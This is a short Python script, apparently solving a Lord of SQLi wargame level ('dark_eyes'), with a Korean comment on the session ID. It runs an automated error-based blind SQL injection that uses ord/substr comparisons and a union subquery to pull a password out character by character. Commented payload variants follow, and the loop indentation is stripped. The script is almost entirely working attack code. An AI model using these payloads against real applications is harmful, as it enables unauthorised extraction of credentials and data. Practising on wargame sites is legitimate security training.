import requests
url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"
cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" } ## 세션 ID
list1 = []
for k in range( 1, 12 ):
for j in range( 30, 300):
text = "' or ord(substr(pw,"+str(k)+",1))>"+str(j)+" or (select 1 union select ord(substr(pw,1,1))) -- "
params = { 'pw' : text }
response = requests.get( url, params = params, cookies = cookies )
print(text)
print(response.text)
if( not "ord" in response.text ):
print( response.text )
list1.append(chr(j+1))
break
print(list1)
#' or 1=(select (ord(substr(pw,1,1))>10)) or (select 1 union select 2) --%20
#' or id='admin' and ord(substr(pw,1,1))=33 or (select 1 union select ord(substr(pw,1,1))) --%20